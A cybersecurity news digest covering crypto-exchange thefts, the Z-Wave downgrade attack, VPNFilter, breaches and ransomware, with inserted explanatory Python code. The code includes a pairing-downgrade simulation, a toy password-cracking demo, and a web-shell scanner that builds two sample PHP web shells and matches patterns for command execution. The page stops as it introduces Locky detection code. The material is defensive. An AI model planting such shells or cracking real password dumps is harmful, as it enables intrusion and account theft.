

#Hacker Steals $13.5 Million From #Bancor #Cryptocurrency #Exchange

In a statement published hours ago, Israel-based cryptocurrency exchange Bancor disclosed a security incident in which a hacker made off with roughly $13.5 million worth of cryptocurrency.

The hack took place yesterday, July 9, at 00:00 UTC, according to Bancor, after an unknown intruder or intruders gained access to one of the company’s wallets.

This matters because Bancor does not operate as a classic exchange platform; it converts tokens through smart contracts running on Ethereum, which lets it move funds faster than a conventional exchange.

The compromised wallet also held the permission to update the smart contracts responsible for converting user funds, so control of that single key meant control of the contracts themselves.

Bancor says the hacker used this access to withdraw 24,984 Ether (ETH), worth about $12.5 million, from Bancor smart contracts and sent the Ether to a wallet under their own control.

Similarly, the attacker withdrew 229,356,645 Pundi X (NPXS) tokens, worth another $1 million.

Security feature prevents theft of another $10 million

The hacker also withdrew 3,200,000 Bancor tokens (BNT), worth around $10 million, which Bancor had issued last year in an ICO that raised over $150 million. Bancor says a security feature built into the BNT token allowed it to freeze those funds and prevent the hacker from cashing them out on other exchanges.

“It is not possible to freeze the ETH and any other stolen tokens,” Bancor says. “However, we are working together with dozens of cryptocurrency exchanges to trace the stolen funds and make it more difficult for the thief to liquidate them.”

Bancor said the hacker didn’t compromise any user wallets. The theft appears to have affected only Bancor’s reserves, which the company held to facilitate the cryptocurrency exchange process.

Bancor did not reveal how the hack took place but promised more updates in the coming days via its website and Twitter account. Bancor’s platform is currently down for maintenance.

Last year, a security researcher criticized the Bancor platform for using smart contracts that contained several security flaws.

The post #Hacker Steals $13.5 Million From #Bancor #Cryptocurrency #Exchange appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

A #Basic Z-Wave #Hack #Exposes Up To 100 #Million Smart #Home #Devices

So-called “smart” locks and alarms are proliferating across people’s homes, even though hackers have repeatedly demonstrated design weaknesses that contradict their claims of being secure.

Now security researchers in the U.K. have shown just how quickly and easily one of those keyless connected locks can be popped open. What’s more, the five-year-old flaw lies in software that has shipped in more than 100 million devices meant to make the home smarter and more secure. Doorbells, bulbs and house alarms are among the many products from some 2,400 vendors shipping the flawed code. Tens of millions of smart home devices are now vulnerable to attacks that could lead to break-ins or a digital haunting, the researchers warned.

For their demonstration, the researchers, Ken Munro and Andrew Tierney of Pen Test Partners, focused on the Conexis L1 Smart Door Lock, the $360 flagship product of British lock maker Yale. As relayed to Forbes ahead of their report, Munro and Tierney found a weakness in the underlying standard the lock uses to communicate with the paired controller. Those communications could be intercepted and manipulated so that someone within radio range could steal the keys and unlock the door.

The standard in question is Z-Wave S2. It is the wireless protocol smart home equipment uses to talk to other devices, and an update to the older Z-Wave S0, whose key exchange could be exploited to grab those crucial keys quickly. Indeed, S0 keys were “trivial” to decrypt, according to Pen Test Partners’ research.

Z-Wave S2 is more secure than S0. It shares keys using a Diffie-Hellman exchange, a well-regarded and well-tested method for establishing a shared secret so that the devices exchanging keys can be treated as legitimate and trusted. But although the Yale device, bought by Munro and Tierney just a couple of weeks earlier and kept up to date, supported S2, the researchers found it was possible to quickly downgrade the pairing to the older, much less secure key-sharing mechanism.

While a user paired a controller (such as a smartphone or smart home hub) with the lock, Munro and Tierney could force the less secure S0 method to be used. From there, they could recover the keys and gain permanent access to the Yale lock, and therefore to whatever building it protected, without the real user’s knowledge. They believe the attack, dubbed Z-Shave, works from up to 100 meters away.
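The downgrade described above, modelled in Python as an added example (this is not Pen Test Partners’ tooling or any Z-Wave Alliance code). During inclusion the joining node advertises which security classes it supports; Z-Shave works because a controller that sees only S0 advertised falls back to S0, whose key exchange protects the network key with a fixed value every S0 device knows, which is why those keys were “trivial” to decrypt. The class names, frame layout, the XOR stand-in for S0’s encryption and the random stand-in for the Diffie-Hellman output are all simplifications, and the `require_s2` policy switch is an assumption about what a hardened controller could do; the permissive path emits the kind of degradation warning SiLabs says controllers already give.

```python
"""Pairing downgrade (Z-Shave style) against a simplified S0/S2 model.

Added illustration, not Pen Test Partners' tooling or Z-Wave Alliance code.
Class names, frame layout and key handling are stand-ins for the real
Z-Wave inclusion exchange.
"""
import secrets
from dataclasses import dataclass

S0 = "SECURITY_S0"   # legacy: network key shipped under a fixed, shared key
S2 = "SECURITY_S2"   # modern: per-pairing secret from a Diffie-Hellman exchange

# Assumption for the model: S0 wraps the network key with a value every
# S0 device knows, so one captured frame yields the network key.
WELL_KNOWN_S0_KEY = bytes(16)


@dataclass
class Device:
    name: str
    security_classes: tuple   # what the device genuinely supports


def node_info_frame(dev):
    """Joining node advertises the security classes it supports."""
    return {"node": dev.name, "security": list(dev.security_classes)}


def z_shave(nif):
    """Attacker in radio range forges the advertisement so only S0 remains."""
    forged = dict(nif)
    forged["security"] = [c for c in nif["security"] if c != S2] or [S0]
    return forged


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def run_inclusion(nif, network_key, require_s2=False):
    """Controller side of pairing: pick a class, then hand over the network key.

    S0 protection is modelled as XOR with WELL_KNOWN_S0_KEY (the real S0
    exchange encrypts rather than XORs, but under a key every S0 device has);
    S2 protection is modelled as XOR with a fresh per-pairing secret standing
    in for the Diffie-Hellman output.
    """
    if S2 in nif["security"]:
        pairing_secret = secrets.token_bytes(16)
        return {"class": S2,
                "wrapped_key": xor_bytes(network_key, pairing_secret),
                "warning": None}
    if require_s2:
        # Hardened policy (assumption): refuse rather than degrade.
        return {"class": None, "wrapped_key": None,
                "warning": "inclusion aborted: node offers S0 only"}
    return {"class": S0,
            "wrapped_key": xor_bytes(network_key, WELL_KNOWN_S0_KEY),
            "warning": "network link has degraded to S0"}


def eavesdropper_recovers_key(result):
    """What a passive listener learns from the captured key-exchange frame."""
    if result["class"] == S0:
        return xor_bytes(result["wrapped_key"], WELL_KNOWN_S0_KEY)
    return None   # S2: secret is per pairing; refused: nothing was sent


def demo(require_s2):
    """Pair an S2-capable lock while Z-Shave is running; report the outcome."""
    lock = Device("Conexis L1", (S0, S2))
    network_key = bytes(range(16))          # constructed demo key
    result = run_inclusion(z_shave(node_info_frame(lock)), network_key, require_s2)
    return result["class"], eavesdropper_recovers_key(result) == network_key


if __name__ == "__main__":
    print("permissive controller:", demo(require_s2=False))   # ('SECURITY_S0', True)
    print("strict controller:", demo(require_s2=True))        # (None, False)
```

The permissive controller pairs successfully and the listener walks away with the network key; the strict controller loses compatibility with S0-only devices, which is exactly the trade-off Munro describes below when he notes that an S2-only update would stop devices working with S0 controllers.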

“It’s not difficult to exploit,” Munro said. “Software Defined Radio tools and a free software Z-Wave controller are all that’s needed.” In 2016, hackers created a free program designed to exploit Z-Wave devices called EZ-Wave.

Yale owner ASSA ABLOY said it understood the Z-Wave Alliance was conducting an investigation into the matter and was in close contact. ASSA ABLOY will also be conducting its own investigation, a spokesperson said, adding that it was “constantly updating and reviewing products in line with the latest technologies, standards and threats.”

No updates?

Munro told Forbes it should be possible to update many Z-Wave-based devices with a wireless update of both the app and the device. “However, it’s an issue with the Z-Wave standard, so would require a massive change by the Alliance, then an update pushed to all devices that support S2, which would likely stop them working with S0 controllers. And there are hardly any S2 controllers on the market. None in the U.K.,” he added.

Silicon Labs (SiLabs), the $4.5 billion market cap company that owns the Z-Wave technology, acknowledged that “a known device pairing vulnerability” existed, but did not specify any upcoming updates and downplayed the severity of the attack, adding that “there have been no known real-world exploits to report.”

The company referred Forbes to the first description of the S0 decryption attack, disclosed in 2013 by SensePost, which judged the attack not “interesting” because it was limited to the timeframe of the pairing process. SiLabs accordingly said it did not see the S0 pairing issue “as a serious threat in the real world” because “there is an extremely small window in which anyone could exploit the issue” during pairing, adding that a warning is shown if a downgrade occurs. “S2 is the best-in-class standard for security in the smart home today, with no known vulnerabilities,” the spokesperson added, pointing to a blog post SiLabs published Wednesday.

Munro said it would be possible to set up an automated attack that would make it more reliable. “It should be easy to set up an automated listener waiting for the pairing, then automatically grab the key,” he said.

The company said the problem existed because of a need to provide backwards compatibility, as a spokesperson explained: “The feature of S2 in question – device pairing – requires both devices have S2 to work at that level. But of course the adoption of this framework across the entire ecosystem doesn’t happen overnight. In the meantime, we do provide the end user with a warning from the controller or hub if an S0 device is on the network or if the network link has degraded to S0.”

Munro was flabbergasted by the vendor’s overall response. “After attempting responsible disclosure and getting little meaningful response, on full disclosure Z-Wave finally acknowledged that it’s been a known issue for the last few years. Internet of Things (IoT) devices are at their most vulnerable during initial set-up. S2 Security does little to solve that problem.”



Russian #hackers could #instantly cut #off the #internet for #half a #million people

Russian hackers have infected more than half a million routers across 54 countries with sophisticated malware that contains a kill switch capable of instantly cutting off internet access for their users, security researchers have revealed.

The VPNFilter malware also allows attackers to monitor the web traffic of anyone using the routers, including their passwords, potentially opening the door to further attacks.

“Both the scale and capability of this operation are concerning,” William Largent, a researcher at the cybersecurity firm Talos, said in a blog post describing the malware.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users’ devices to cover up their tracks, going much further than simply removing traces of the malware.”

The malware has been attributed to a group of Russian hackers variously known as Sofacy Group, Fancy Bear and APT28. The group has been active since the mid-2000s and has previously been blamed for attacks on targets ranging from the Ukrainian military to the 2017 French elections.

Security researchers tell The Independent that the discovery of the malware highlights a broader issue of how vulnerable internet-connected infrastructure is to cyber attacks.

“No longer can we afford to keep our critical infrastructure connected to, and therefore directly accessible to, the internet,” said Eric Trexler, vice president of global governments and critical infrastructure at cybersecurity firm Forcepoint.

“VPNFilter proves that time-tested military techniques such as network segregation not only make sense, but are required if we expect industrial services to remain resilient in the face of sophisticated and persistent attacks.”

Devices found to be vulnerable to VPNFilter include routers from Linksys, MikroTik, Netgear and TP-Link, all of which are commonly used in homes and small offices. The researchers say they have not yet completed their research but are publishing now to draw attention to the threat.

“Defending against this threat is extremely difficult due to the nature of the affected devices,” Mr Largent said.

“The majority of them are connected directly to the internet, with no security devices or services between them and the potential attackers.”

The FBI responded to the revelations by obtaining court permission to seize a web domain believed to be under the control of the Russian hackers.

“This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities,” Assistant Attorney General for National Security John Demers said in a statement on Wednesday.


FBI Special Agent Bob Johnson added: “Although there is still much to be learned about how this particular threat initially compromises infected routers and other devices, we encourage citizens and businesses to keep their network equipment updated and to change default passwords.”


Under Armour #admits 150 #million #MyFitnessPal #accounts were #hacked

Under Armour said on Thursday that data from some 150 million MyFitnessPal diet and fitness app accounts was compromised in February, in one of the biggest hacks in history, sending shares of the athletic apparel maker down 3 percent in after-hours trade.

The stolen data includes account user names, email addresses and hashed (“scrambled”) passwords for the popular MyFitnessPal mobile app and website, Under Armour said in a statement. Social Security numbers, driver’s license numbers and payment card data were not compromised, it said.
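How much a dump of “scrambled” passwords is worth to an attacker depends entirely on how they were scrambled, which the article does not say. The following Python is an added example, not Under Armour’s code, and both schemes and all user records in it are constructed: it contrasts an unsalted fast hash, where one precomputed table cracks every user at once and identical passwords are visible before any cracking, with a salted, iterated derivation (PBKDF2 here as a stand-in for bcrypt-class schemes), where every guess has to be re-derived per user. Weak passwords still fall either way, which is why a forced reset is the right response regardless of scheme.

```python
"""Why the hashing behind “scrambled passwords” decides how bad a dump is.

Added example; not Under Armour's code, and the article does not say which
schemes MyFitnessPal used. Both schemes and all sample records below are
constructed for illustration.
"""
import hashlib
import hmac
import os

ROUNDS = 20_000   # kept low for the demo; production deployments use far more

# Stand-in for the multi-gigabyte wordlists attackers really run.
WORDLIST = ["password", "123456", "letmein", "fitness2018", "qwerty"]


def unsalted_sha1(password):
    """Legacy scheme: identical passwords give identical digests."""
    return hashlib.sha1(password.encode()).hexdigest()


def salted_pbkdf2(password, salt, rounds=ROUNDS):
    """Salted, iterated scheme: unique salt per user and deliberately slow."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, stored):
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk.hex(), dk_hex)


def build_sample_dump():
    """Constructed user records stored under each scheme."""
    users = {"alice": "fitness2018", "bob": "password", "carol": "fitness2018"}
    legacy = {u: unsalted_sha1(p) for u, p in users.items()}
    modern = {u: salted_pbkdf2(p, os.urandom(16)) for u, p in users.items()}
    return users, legacy, modern


def crack_unsalted(dump):
    """One table, computed once, cracks every user sharing a common password."""
    table = {unsalted_sha1(w): w for w in WORDLIST}
    return {user: table[h] for user, h in dump.items() if h in table}


def crack_salted(dump):
    """No shared table: every guess is re-derived per user, per salt.

    Returns the cracked accounts and the total PBKDF2 iterations spent, the
    cost that scales with user count and makes mass cracking expensive.
    """
    cracked, work = {}, 0
    for user, stored in dump.items():
        rounds = int(stored.split("$")[1])
        for guess in WORDLIST:
            work += rounds
            if verify_pbkdf2(guess, stored):
                cracked[user] = guess
                break
    return cracked, work


if __name__ == "__main__":
    users, legacy, modern = build_sample_dump()
    print("shared password visible in legacy dump:", legacy["alice"] == legacy["carol"])
    print("legacy cracked:", crack_unsalted(legacy))
    cracked, work = crack_salted(modern)
    print("salted cracked:", cracked, "after", work, "PBKDF2 iterations")
```

With three users the salted run already costs nine full derivations; at 150 million accounts the same wordlist costs 150 million times the per-user work, while the unsalted table costs one pass regardless of user count.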

It is the largest data breach this year and one of the top five to date, based on the number of records compromised, according to SecurityScorecard.

Larger hacks include 3 billion Yahoo accounts compromised in a 2013 incident and credentials for more than 412 million users of adult websites run by California-based FriendFinder Networks Inc in 2016, according to breach notification website

Under Armour said it is working with data security firms and law enforcement, but did not provide details on how the hackers got into its network or pulled out the data without getting caught in the act.

While the breach did not include financial data, large troves of stolen email addresses can be valuable to cyber criminals.

Email addresses retrieved in a 2014 attack that compromised data on some 83 million JPMorgan Chase customers were later used in pump-and-dump schemes to boost stock prices, according to U.S. federal indictments in the case in 2015.

Under Armour said in an alert on its website that it will require MyFitnessPal users to change their passwords, and urged them to do so immediately.

“We continue to monitor for suspicious activity and to coordinate with law enforcement authorities,” the company said, adding that it was bolstering systems that detect and prevent unauthorized access to user information.

Under Armour said it started notifying users of the breach on Thursday, four days after it first learned of the incident.

Under Armour bought MyFitnessPal in 2015 for $475 million. It is part of the company’s connected fitness division, whose revenue last year accounted for 1.8 percent of Under Armour’s $5 billion in total sales.



Private #Equity Giants Buy #Cybersecurity #Firm for $400 #Million

Source: National Cyber Security News

The trend of private equity firms snapping up cybersecurity businesses continues.

BlackRock and Pamplona Capital Management have jointly acquired PhishMe, a cybersecurity company based in Leesburg, Va., in a deal that valued the firm at $400 million.

Pamplona has purchased a two-thirds stake in the business, while BlackRock has bought the remainder, a person familiar with the terms of the deal told Fortune.

In addition to the change in ownership, PhishMe on Monday rebranded itself as “Cofense.” The new name derives from a combination of “collaborative” (or “collective”) and “defense.”

Rohyt Belani, CEO and cofounder of the company now called Cofense, said the executive team decided to sell the business to allow “early investors to cash out, and for employees and common stock holders to partake in the spoils.” The company was last privately valued at roughly $200 million after its most recent fundraising round in July 2016, according to Pitchbook, a database that tracks venture capital deals.

The cybersecurity industry benefited from a flurry of VC activity as big data breaches made headlines over the past few years. A recent pullback in funding, however, has left a glut of companies struggling to find new means of financing.


Hackers #steal $64 #million from #cryptocurrency firm #NiceHash

A Slovenian cryptocurrency mining marketplace, NiceHash, said it lost about $64 million worth of bitcoin in a hack of its payment system, the latest incident to highlight risks that uneven oversight and security pose to booming digital currencies.

NiceHash matches people looking to sell processing time on computers in exchange for bitcoin.

There have been at least three dozen heists on exchanges that buy and sell digital currencies since 2011, including one that led to the 2014 collapse of Mt. Gox, once the world’s largest bitcoin market.

More than 980,000 bitcoins have been stolen from exchanges, which would be worth more than $15 billion at current exchange rates. Few have been recovered, leaving some investors without any compensation.

The hacks have not kept demand for digital currencies from soaring. Bitcoin’s value has climbed more than 15-fold so far this year, closing at a record $16,000 on the Luxembourg-based Bitstamp exchange on Thursday, ahead of this weekend’s launch of bitcoin futures by CBOE.

Security experts said they expect the cyber-crime spree to pick up as the rising valuations attract interest from cyber criminals looking for victims that lack experience defending against hacks.

“These exchanges are not in my opinion secure,” said Gartner security analyst Avivah Litan. “You don’t know what their security is like behind the scenes.”

NiceHash executive Andrej P. Škraba told Reuters that his firm was the victim of “a highly professional” heist that yielded about 4,700 bitcoin, worth around $64 million.

Sophisticated criminal groups are increasingly targeting the cryptocurrency industry, focusing on exchanges and other types of firms in the sector, said Noam Jolles, a senior intelligence specialist with Israeli cyber-security company Diskin Advanced Technologies.

“The most sophisticated groups are going into this area,” she said.

NiceHash, which advised users to change online passwords after it halted operations on Wednesday, has provided few other details about the attack on its payment system.

“We ask for patience and understanding while we investigate the causes and find the appropriate solutions for the future of the service,” it said on its website.

It was unclear whether customers faced any losses from the hack.

Slovenian police said they were looking into the hack, but declined to elaborate.


Governor #Deal announces $35 #million for #cybersecurity center #expansion

Source: National Cyber Security – Produced By Gregory Evans

The Georgia Cyber Innovation and Training Center was already a big project, but it just got bigger, by $35 million to be exact. Today Governor Nathan Deal announced a second building, with construction set to begin immediately.

Augusta University President Brooks Keel calls it a pretty sweet deal, not only for the students and the state but for the entire country.

The first building won’t be finished until July 2018. The new second one won’t be done until a year from now, in December 2018.

Keel says, “It will allow us to just really explode innovation.”

Innovation that he believes can start a boom for business, not just in the downtown area near the building but throughout the entire city.

“It’s being able to take this piece of training to provide for the workforce and turn that into a giant magnet to bring in business to Augusta.”

He told News 12 that’s going to bring more jobs and attention to Augusta.

It’s this kind of attention that Augusta University cyber students like Bryce Floyd are waiting for. Floyd is a junior who says he’s excited to get to spend at least one semester in the new second building before he graduates.

“Well, I’m excited they’re investing that much into my field and my major, and I’m really happy that they’re thinking about the future.”

According to his school president Keel, it’s a future where studying cyber will transform easily into a career.

Keel said the new building is part of a “concept” where students would have class on one side of the hallway. Then, after class, they could simply walk over to the other side of the hall for their internship.

New halls, new classrooms, more equipment and advanced labs are all part of the reason why Floyd believes it made sense to add an extra building.

He believes Augusta earned it.

“This is definitely, in America, probably one of the leading areas for cyber security.”

What was only an idea a year ago– now is a steel structure with a new promise for an even bigger design.

“When Governor Nathan Deal first announced the 50 million dollar facility, then turned it into a 60 million dollar facility, there were two parts to it, innovation and training,” said Dr. Brooks Keel.

You could say Training is being built.

That’s the focus of the first building.

Innovation is the second 35 million dollar, 165,000 square foot building announced today.

It’s going to start being built immediately and will open its doors in a year.

Augusta University President Dr. Brooks Keel says moving quickly is everything in this industry.

“When you’re talking about lightning speed I can’t think of a technology that’s quicker than cyber, and beyond that cybersecurity. You have to be not just on the cutting edge but the bleeding edge to be on top of the growth with cyber,” he said.

That’s exactly what Governor Deal wants. He says these projects will help make Georgia the leader in the nation for cyber, setting Augusta and Augusta University ahead as well. While the project grows, the school’s reach grows also.

“I’ve been saying for a while that’s just phase one, here’s phase two, and there’s more to come on that parcel of land there,” he said.

So the now more than $90 million in cyber investments in downtown Augusta is paving the way for a brighter future for the city, the state and the whole nation.

Governor Deal announced $35 million in funding to expand Augusta’s Hull McKnight Georgia Cyber Innovation and Training Center.

According to a release from the Governor’s Communications Office, Deal said, “Given Georgia’s growing status as a technology and innovation hub, this additional investment will further cement our reputation as the ‘Silicon Valley of the South.’ When complete, the center will house a cyber range, the Georgia Bureau of Investigation’s new cyber crime unit and an incubator for startup cybersecurity companies.”

Construction of the new facility will begin immediately. The 165,000 square foot space will serve as a training facility for information security professionals employed by state and local governments. The space will also allow tech companies to establish fellowships, internships and co-op programs for students and employees.

The Georgia Technology Authority (GTA) will oversee the construction and operation of the cybersecurity center facilities. The GTA is partnered with the U.S. Army Cyber Center of Excellence at Fort Gordon, the Georgia National Guard, the Georgia Bureau of Investigation and the City of Augusta, among others, as well as with schools, colleges and private corporations.

The first phase of the Cyber Center is scheduled to open in July. The second is scheduled to be completed in December 2018.


Verticalscope #hacked again: At least 2.7 million #accounts #compromised in second major #data #breach


Hackers have once again targeted Verticalscope, a Canadian firm that manages hundreds of popular web discussion forums with more than 45 million user accounts. The latest breach compromised at least 2.7 million accounts. The Toronto-based company runs a network of support forums and online community websites catering to a wide range of interests, from outdoor and automotive to sports and technology.

In June 2016, Verticalscope admitted that it had suffered a data breach that saw at least 45 million user accounts compromised and their data leaked in a blog post on

The latest breach impacted six websites, including – the company’s second-most popular website – and, security expert Brian Krebs first reported.

Security researcher and founder of Hold Security, Alex Holden, notified Krebs last week that hackers were selling access to and a number of other sites operated by the company.

Holden initially suspected that a nefarious actor was just trying to resell data stolen in the 2016 breach.

“That was before he contacted one of the hackers selling the data and was given screen shots indicating that and several other properties were in fact compromised with a backdoor known as a ‘Web shell’,” Krebs wrote. “With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.”

Although the hackers had obfuscated certain details in the screenshots, enough reportedly remained for Holden to locate at least two backdoors on Verticalscope’s website and, one of the company’s most popular forums.

Krebs reported that a simple search on one of Verticalscope’s compromised domains led to a series of Pastebin posts that have since been deleted “suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB”.

“Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address,” Krebs noted. “The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.”

“The intrusion granted access to each individual website’s files,” Verticalscope said in a statement to Krebs. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”
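Verticalscope says it added “the malicious file pattern” to its detection tools. The Python below is an added example of what such a check looks like in practice; it is not Verticalscope’s tooling, the signatures are generic traits of PHP web shells rather than indicators from this incident, and the three-file sample site it scans is constructed in a temporary directory. A web shell of the kind Krebs describes is just a PHP file that hands attacker input to `eval` or a system command, so the scanner weights the traits that distinguish that from ordinary forum code and flags files that cross a threshold.

```python
"""Heuristic scan of a web root for PHP web shells like the one described above.

Added example; this is not Verticalscope's detection tooling, and the
signatures are generic web shell traits rather than indicators from this
incident. The sample site is constructed in a temporary directory.
"""
import os
import re
import tempfile

USER_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
EXEC_FUNCS = r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\("
DECODERS = r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\("

# (name, weight, pattern): weights add up, so one strong trait or several
# weak ones push a file over THRESHOLD.
RULES = [
    ("exec-of-user-input", 5, re.compile(EXEC_FUNCS + r"[^;]*" + USER_INPUT, re.I)),
    ("eval-of-decoded-blob", 4, re.compile(r"\beval\s*\([^;]*" + DECODERS, re.I)),
    ("preg_replace-e-modifier", 4,
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/\w*e\w*['\"]", re.I)),
    ("stacked-decoders", 3, re.compile(DECODERS + r"\s*" + DECODERS, re.I)),
    ("dynamic-function-call", 3, re.compile(r"\$\w+\s*\(\s*" + USER_INPUT, re.I)),
    ("upload-handler", 2, re.compile(r"\bmove_uploaded_file\s*\(", re.I)),
    ("long-base64-literal", 2, re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]
THRESHOLD = 4


def scan_source(src):
    """Return (score, matched rule names) for one file's source."""
    hits = [name for name, _, rx in RULES if rx.search(src)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits


def scan_tree(root, exts=(".php", ".phtml", ".php5", ".inc")):
    """Walk a document root; report files scoring at or above THRESHOLD."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = scan_source(fh.read())
            if score >= THRESHOLD:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = (score, hits)
    return findings


# Constructed sample files: one legitimate page and two planted shells.
BENIGN = """<?php
require __DIR__ . '/config.php';
$page = isset($_GET['page']) ? (int) $_GET['page'] : 1;
echo render_forum_index($page);
"""
SIMPLE_SHELL = """<?php
if (isset($_REQUEST['cmd'])) { echo '<pre>'; system($_REQUEST['cmd']); echo '</pre>'; }
"""
OBFUSCATED_SHELL = """<?php
$p = $_POST['z'];
@eval(gzinflate(base64_decode($p)));
"""


def build_sample_site():
    """Write the constructed files into a fresh temp directory and return it."""
    root = tempfile.mkdtemp(prefix="forum-")
    for rel, body in {"index.php": BENIGN,
                      "uploads/avatar.php": SIMPLE_SHELL,
                      "includes/.cache.php": OBFUSCATED_SHELL}.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for path, (score, hits) in scan_tree(build_sample_site()).items():
        print(f"{path}: score={score} {hits}")
```

Heuristics like these catch the common shells and the lazily obfuscated ones; the stronger control, which the scan complements rather than replaces, is comparing the deployed tree against the release manifest so that any PHP file the build did not ship, such as a dot-file under includes/ or a .php under an uploads directory, is flagged on sight regardless of content.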

The company did not provide any details regarding when and how the attack took place or who carried out the hack. IBTimes UK has reached out to Verticalscope for further details.


Identity #theft alert: How 77,000 Canadians lost $99 million last year in #extortion, #phishing and #romance scams


Randy Chester was visiting one of his usual second-hand haunts this summer, a Value Village in Toronto’s east end, when he spied a beautiful shirt and vest for $20. Excited about his new finds, he tapped his debit card, only to be shocked by the resulting message: Insufficient funds.

“I was upset because I knew I had money,” he recalls. He tried the card again at a variety store, a restaurant and then at an ATM belonging to his bank, CIBC, and got the same message. When he called the bank to see what was going on, they asked him if he had been shopping at Yorkdale Mall in the city’s north end. There was a $1,500 purchase debited from his account, but Chester, a cancer patient on disability who uses a walker, had been at a medical appointment at the Princess Margaret Cancer Hospital that day.

“It’s like, hello!” he jokes. “Value Village, yes. Yorkdale Mall, no. I couldn’t get there with my walker.”

Then he remembered that a young man had called him on his flip-phone a few days before, claiming to be from CIBC and saying there was a problem with his debit card. Chester knew better than to talk to anyone about his banking information and hung up. The next day, he got a text message, purportedly from CIBC, that had the last four digits of his debit card number in it, and asked him to text back “Y” for yes if it was his account. He assumed because they had his number already, it was legitimate. He hit Y and send.

“The bank told me they would never send a text message,” says Chester, 61. “I didn’t know that.”

Once he reported the problem, the bank locked down his account, reversed the charges, and gave him a new bank card. But it’s impossible to tell how the scammers got his bank information, which is often the case when it comes to identity theft, says Jessica Gunson, the acting call centre and intake unit manager at the Canadian Anti-Fraud Centre in Thunder Bay, Ont.

“It certainly sounds like a variation on phishing,” she says, but notes that it’s unusual because the thief already had Chester’s bank information when he or she sent the text.

“We do know thieves have been known to dumpster dive, and it underlines the importance of having a paper shredder in the home and in the office. We need to treat our personal information like cash.” For that reason, experts advise leaving your Social Insurance Number card and birth certificate in a safe place at home, since thieves can do a lot of damage with your name, birth date and SIN.

The Canadian Anti-Fraud Centre, jointly managed by the Ontario Provincial Police, the RCMP and the federal Competition Bureau, maintains the central database for fraud complaints. Investigators across the country rely on its vast stores of data to compare notes on mass-marketing fraud and online scams. In 2016, it logged more than 77,000 complaints that resulted in losses of more than $99 million, with the top scams by complaint involving extortion, phishing and fake computer-service companies. The frauds that resulted in the most money lost were romance scams, at more than $20 million.

Though Gunson could not begin to guess how criminals got Chester’s information, she said it is important never to leave a paper receipt of a transaction in or near the banking machine, and to use online banking to check balances, rather than printing them out at ATMs.

“When it comes to identity theft and identity fraud, the difficulty is in pinpointing the source. Unless (investigators) find a boiler room where people are mass producing ID, it is difficult to determine on an individual basis where it is coming from.”

The good news is most cases of identity theft and identity fraud result in little financial loss to the victims, but Gunson says it takes time and effort to untangle the mess.

In Montreal, actor Paul Burke figures someone used a surveillance camera or fake keypad or card reader to obtain his PIN, which they used to empty his account of $700 in the summer of 2010. He called the bank, which contacted the RCMP. And then he waited.

“I called them back after a week and I said, ‘I have zero money. I need my money back,’” says Burke, 48.

Within a day or two of that call he had the money in his account, but to this day he has no clue what happened.

“It was so bizarre. I consider it a one-off, but obviously I should be more careful.”


20 Million Confirmed #Attacks in 24 Hours: #Locky and Other #Ransomware


A new variant of the aggressive “Locky” ransomware hits 20 million confirmed attacks in a single day, warns a cybersecurity firm.

Ransomware actors are sometimes incredibly sophisticated, demonstrating careful planning and methodical execution. Some individuals or groups launch large-scale campaigns, casting the widest possible net to catch the maximum number of victims.

To protect yourself, it’s best to get familiar with the types of ransomware out there and how to avoid them.

Here are some figures to give you an idea of the massive scale on which ransomware operates:

Last year, ransomware spread increased by a staggering 500%, with email phishing as the most-used distribution method.
In a given month, ransomware infects 30,000-35,000 devices on average.
During the first 6 months of 2016, 300 new ransomware variants were developed. During the same period, an unknown ransomware actor made nearly $100 million USD in profits.
This year, profits generated through ransomware are expected to hit $1 billion USD.

Locky, a Sneaky Ransomware

First appearing in February 2016, Locky is ransomware, a type of malware that takes all of a victim’s files hostage by encrypting them and demanding a ransom to have them returned unencrypted. With the proliferation of cryptocurrencies, hackers usually ask for ransoms to be paid in Bitcoin, for obvious reasons (learn more about Bitcoin anonymity here).

Like most ransomware, Locky infects a system via spam (email sent by a botnet) with a .doc file attached. These emails often come with a subject line that reads “ATTN: Invoice…” and a message urgently requesting payment of an invoice.

If the victim clicks on the link, Locky is installed quickly; it then scrambles and renames all files on the system with the extension “.locky”, as well as files on other systems connected to the same network.

This ransomware also removes Windows backup copies (shadow copies), which makes it impossible to recover files that way.
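The two behaviours just described, a burst of files renamed to “.locky” and the removal of shadow copies, are what a defender can watch for on an endpoint. The following detection logic is an added example, not code from the original article or from Barracuda; it runs over constructed endpoint telemetry (host names, paths and the hex file names are made up), and assumes shadow-copy removal shows up as a `vssadmin delete shadows` process event.

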